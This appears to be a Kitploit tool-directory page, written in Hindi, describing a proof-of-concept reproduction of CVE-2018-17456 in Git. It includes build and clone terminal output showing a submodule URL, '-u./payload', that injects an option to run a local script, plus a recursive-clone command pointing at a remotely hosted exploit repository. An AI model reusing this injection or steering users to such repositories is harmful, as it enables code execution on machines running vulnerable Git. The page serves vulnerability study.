Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-17456 — CVE-2018-17456 भेद्यता पुनरुत्पादन(PoC+Exp) | Kitploit
उपकरण/GitHubGitHub/anonymking/cve-2018-17456
भेद्यता विश्लेषणकोड विश्लेषणशोषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षाबाइनरी शोषण
GitHubanonymking/cve-2018-17456

CVE-2018-17456

CVE-2018-17456 भेद्यता पुनरुत्पादन(PoC+Exp)

रिपॉजिटरी देखें
537 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-17456

भेद्यता परिचय

  • भेद्यता नाम: Git इनपुट सत्यापन त्रुटि भेद्यता
  • CNNVD आईडी: CNNVD-201810-234
  • खतरा स्तर: अत्यधिक खतरनाक
  • CVE आईडी: CVE-2018-17456
  • भेद्यता प्रकार: इनपुट सत्यापन त्रुटि
  • प्रकाशन तिथि: 2018-10-08
  • खतरा प्रकार: दूरस्थ
  • अद्यतन तिथि: 2019-04-25
  • निर्माता: debian
  • भेद्यता स्रोत: Atlassian, TerryZh...
  • भेद्यता परिचय: Git एक मुफ्त, ओपन-सोर्स वितरित संस्करण नियंत्रण प्रणाली है। Git में इनपुट सत्यापन त्रुटि भेद्यता मौजूद है। यह भेद्यता नेटवर्क सिस्टम या उत्पाद द्वारा इनपुट डेटा के सही सत्यापन न करने के कारण उत्पन्न होती है। निम्नलिखित संस्करण प्रभावित हैं: Git 2.14.5 से पहले के संस्करण, 2.15.x संस्करण 2.15.3 से पहले, 2.16.x संस्करण 2.16.5 से पहले, 2.17.x संस्करण 2.17.2 से पहले, 2.18.x संस्करण 2.18.1 से पहले, 2.19.x संस्करण 2.19.1 से पहले।

भेद्यता पुनरुत्पादन

  • GitHub सुरक्षा तंत्र की समस्या के कारण, दुर्भावनापूर्ण प्रोजेक्ट अपलोड नहीं किया जा सकता, इसलिए आप सीखने और परीक्षण के लिए स्थानीय रूप से इस प्रोजेक्ट का निर्माण करने के लिए स्क्रिप्ट build.sh चला सकते हैं।
  • मैंने Git के संस्करण git-2.12.1 का उपयोग किया।
  • प्रक्रिया और परिणाम इस प्रकार हैं:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • मैंने payload में दुर्भावनापूर्ण कोड बनाया है जो एक बुद्ध को आउटपुट करता है, इसलिए बुद्ध को देखने का मतलब है कि परीक्षण सफल रहा; यह स्थान दो बार आउटपुट होगा क्योंकि उप-प्रोजेक्ट क्लोन करने में विफल होने पर एक पुनः प्रयास होता है।

संदर्भ

  • प्रोजेक्ट poc-submodule

अनपेक्षित खोज

  • मैंने Coding पर इस प्रोजेक्ट को सफलतापूर्वक बनाया — CVE-2018-17456
  • उपयोग विधि:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • इसके अलावा, दो समान भेद्यताओं को एक साथ सीखने की अनुशंसा की जाती है: CVE-2017-1000117, CVE-2018-11235
टूल डाउनलोड करें